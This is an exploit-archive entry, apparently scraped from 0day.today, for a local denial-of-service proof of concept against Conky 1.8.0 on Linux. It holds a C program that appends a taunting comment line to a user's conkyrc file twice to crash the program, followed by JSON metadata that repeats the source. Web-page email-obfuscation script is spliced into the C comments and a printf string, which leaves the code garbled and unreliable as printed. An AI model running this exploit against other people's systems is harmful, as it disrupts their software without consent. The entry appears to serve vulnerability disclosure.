ID 1337DAY-ID-16334
Type zdt
Reporter Arturo D'Elia
Modified 2011-06-14T00:00:00
Description
Exploit for linux platform in category dos / poc
/* */
/* Vulnerability Conky 1.8.0 on Linux */
/* Tested on: Linux with kernel 2.6.32.1-smp */
/* Found: by Arturo D'Elia */
/* Date found: 12 Dec 2010 */
/* Fix: No Fix */
/* Contacts: [email protected]<script type="text/javascript">
/* <![CDATA[ */
(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
/* ]]> */
</script> */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char killyou[]= "# w000wwwww i exploit it and i kill you!";
int main( int argc, char **argv){
FILE *fp;
/* Write the information program*/
printf("\n[*] Conky 1.8.0 Local DoS/PoC Exploit [*]\n");
printf("[*] Coded by: Arturo D'Elia\n");
printf("[*] Tested on: Linux\n");
printf("[*] Kernel version: 2.6.32.1-smp\n");
printf("[*] Bug Found: 12 Dec 2010\n");
printf("[*] Contacts: [email protected]<script type="text/javascript">
/* <![CDATA[ */
(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
/* ]]> */
</script>\n\n");
/* Check the input parameter */
if(argc!=2)
exit(fprintf(stderr,"Usage: %s < path conkyrc >\n",argv[0]));
/* Check file exsist */
printf("[>] Open conky configuration\n");
if((fp=fopen(argv[1],"r"))==NULL)
exit(fprintf(stderr,"[x] Cannot open %s file\n",argv[1]));
fclose(fp);
/* Open file for append and i send it the */
/* exploited strings */
fp=fopen(argv[1],"a");
printf("[>] Send the DoS/PoC string\n");
fprintf(fp,"%s\n",killyou);
fclose(fp);
/* Wait 3 seconds */
usleep(3000000);
/* Resend exploited strings */
fp=fopen(argv[1],"a");
fprintf(fp,"%s\n",killyou);
fclose(fp);
/* Ok guy. */
printf("[*] Ok guy, you kill it.\n\n");
return 0;
}
# 0day.today [2018-04-11] #
{"hash": "999e34df9c282f64d037121397dc9613cff58e7b45e26de919439fac053e313d", "id": "1337DAY-ID-16334", "lastseen": "2018-04-11T19:49:45", "viewCount": 0, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d3bccff9bfcc921c63ddc442be42efb0", "key": "description"}, {"hash": "6477974d5b2b651c9d81a4d0ed8c45fd", "key": "href"}, {"hash": "7b186190bc4a3fe237c4582e957f678a", "key": "modified"}, {"hash": "7b186190bc4a3fe237c4582e957f678a", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "798c145751aed53ec0752826049b187f", "key": "reporter"}, {"hash": "3c60a0ed6688f46ba03fcbb71ab767b2", "key": "sourceData"}, {"hash": "aa75f95a456b08b35a63e210722637c1", "key": "sourceHref"}, {"hash": "ab77a32807d5ecaf21413b9b5f870ce9", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"vulnersScore": 2.1}, "type": "zdt", "sourceHref": "https://0day.today/exploit/16334", "description": "Exploit for linux platform in category dos / poc", "title": "Conky Linux 1.8.0 Local DoS/PoC Exploit", "history": [{"bulletin": {"hash": "8e04a00b846b02f16c04b44028c9b4cbfdfb906c2fd7208644079e261d218670", "id": "1337DAY-ID-16334", "lastseen": "2016-04-20T01:54:40", "enchantments": {"score": {"value": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N/", "modified": "2016-04-20T01:54:40"}}, "hashmap": [{"hash": "7b186190bc4a3fe237c4582e957f678a", "key": "published"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "f3eb3f95c1bb21feba416220e64b62b0", "key": "sourceHref"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "7b186190bc4a3fe237c4582e957f678a", "key": "modified"}, {"hash": "5b4054cb4a7705d4d86de4cf89e3bcbf", "key": "href"}, {"hash": "c4c0c8ffc19818a76dbea0e493d865af", "key": "sourceData"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "ab77a32807d5ecaf21413b9b5f870ce9", "key": "title"}, {"hash": "d3bccff9bfcc921c63ddc442be42efb0", "key": "description"}, {"hash": "798c145751aed53ec0752826049b187f", "key": "reporter"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/16334", "description": "Exploit for linux platform in category dos / poc", "viewCount": 0, "title": "Conky Linux 1.8.0 Local DoS/PoC Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "/* */\r\n/* Vulnerability Conky 1.8.0 on Linux */\r\n/* Tested on: Linux with kernel 2.6.32.1-smp */\r\n/* Found: by Arturo D'Elia */\r\n/* Date found: 12 Dec 2010 */\r\n/* Fix: No Fix */\r\n/* Contacts: arturo.delia@libero.it<script type=\"text/javascript\">\r\n/* <![CDATA[ */\r\n(function(){try{var s,a,i,j,r,c,l=document.getElementById(\"__cf_email__\");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();\r\n/* ]]> */\r\n</script> */\r\n \r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n \r\nchar killyou[]= \"# w000wwwww i exploit it and i kill you!\";\r\n \r\nint main( int argc, char **argv){\r\n \r\n FILE *fp;\r\n \r\n /* Write the information program*/\r\n printf(\"\\n[*] Conky 1.8.0 Local DoS/PoC Exploit [*]\\n\");\r\n printf(\"[*] Coded by: Arturo D'Elia\\n\");\r\n printf(\"[*] Tested on: Linux\\n\");\r\n printf(\"[*] Kernel version: 2.6.32.1-smp\\n\");\r\n printf(\"[*] Bug Found: 12 Dec 2010\\n\");\r\n printf(\"[*] Contacts: arturo.delia@libero.it<script type=\"text/javascript\">\r\n/* <![CDATA[ */\r\n(function(){try{var s,a,i,j,r,c,l=document.getElementById(\"__cf_email__\");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();\r\n/* ]]> */\r\n</script>\\n\\n\");\r\n \r\n /* Check the input parameter */\r\n if(argc!=2)\r\n exit(fprintf(stderr,\"Usage: %s < path conkyrc >\\n\",argv[0]));\r\n \r\n /* Check file exsist */\r\n printf(\"[>] Open conky configuration\\n\");\r\n if((fp=fopen(argv[1],\"r\"))==NULL)\r\n exit(fprintf(stderr,\"[x] Cannot open %s file\\n\",argv[1]));\r\n fclose(fp);\r\n \r\n /* Open file for append and i send it the */\r\n /* exploited strings */\r\n fp=fopen(argv[1],\"a\");\r\n printf(\"[>] Send the DoS/PoC string\\n\");\r\n fprintf(fp,\"%s\\n\",killyou);\r\n fclose(fp);\r\n \r\n /* Wait 3 seconds */\r\n usleep(3000000);\r\n \r\n /* Resend exploited strings */\r\n fp=fopen(argv[1],\"a\");\r\n fprintf(fp,\"%s\\n\",killyou);\r\n fclose(fp);\r\n \r\n /* Ok guy. */\r\n printf(\"[*] Ok guy, you kill it.\\n\\n\");\r\nreturn 0;\r\n}\r\n\r\n\n\n# 0day.today [2016-04-20] #", "published": "2011-06-14T00:00:00", "references": [], "reporter": "Arturo D'Elia", "modified": "2011-06-14T00:00:00", "href": "http://0day.today/exploit/description/16334"}, "lastseen": "2016-04-20T01:54:40", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "/* */\r\n/* Vulnerability Conky 1.8.0 on Linux */\r\n/* Tested on: Linux with kernel 2.6.32.1-smp */\r\n/* Found: by Arturo D'Elia */\r\n/* Date found: 12 Dec 2010 */\r\n/* Fix: No Fix */\r\n/* Contacts: [email\u00a0protected]<script type=\"text/javascript\">\r\n/* <![CDATA[ */\r\n(function(){try{var s,a,i,j,r,c,l=document.getElementById(\"__cf_email__\");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();\r\n/* ]]> */\r\n</script> */\r\n \r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n \r\nchar killyou[]= \"# w000wwwww i exploit it and i kill you!\";\r\n \r\nint main( int argc, char **argv){\r\n \r\n FILE *fp;\r\n \r\n /* Write the information program*/\r\n printf(\"\\n[*] Conky 1.8.0 Local DoS/PoC Exploit [*]\\n\");\r\n printf(\"[*] Coded by: Arturo D'Elia\\n\");\r\n printf(\"[*] Tested on: Linux\\n\");\r\n printf(\"[*] Kernel version: 2.6.32.1-smp\\n\");\r\n printf(\"[*] Bug Found: 12 Dec 2010\\n\");\r\n printf(\"[*] Contacts: [email\u00a0protected]<script type=\"text/javascript\">\r\n/* <![CDATA[ */\r\n(function(){try{var s,a,i,j,r,c,l=document.getElementById(\"__cf_email__\");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();\r\n/* ]]> */\r\n</script>\\n\\n\");\r\n \r\n /* Check the input parameter */\r\n if(argc!=2)\r\n exit(fprintf(stderr,\"Usage: %s < path conkyrc >\\n\",argv[0]));\r\n \r\n /* Check file exsist */\r\n printf(\"[>] Open conky configuration\\n\");\r\n if((fp=fopen(argv[1],\"r\"))==NULL)\r\n exit(fprintf(stderr,\"[x] Cannot open %s file\\n\",argv[1]));\r\n fclose(fp);\r\n \r\n /* Open file for append and i send it the */\r\n /* exploited strings */\r\n fp=fopen(argv[1],\"a\");\r\n printf(\"[>] Send the DoS/PoC string\\n\");\r\n fprintf(fp,\"%s\\n\",killyou);\r\n fclose(fp);\r\n \r\n /* Wait 3 seconds */\r\n usleep(3000000);\r\n \r\n /* Resend exploited strings */\r\n fp=fopen(argv[1],\"a\");\r\n fprintf(fp,\"%s\\n\",killyou);\r\n fclose(fp);\r\n \r\n /* Ok guy. */\r\n printf(\"[*] Ok guy, you kill it.\\n\\n\");\r\nreturn 0;\r\n}\r\n\r\n\n\n# 0day.today [2018-04-11] #", "published": "2011-06-14T00:00:00", "references": [], "reporter": "Arturo D'Elia", "modified": "2011-06-14T00:00:00", "href": "https://0day.today/exploit/description/16334"}
{"result": {}}
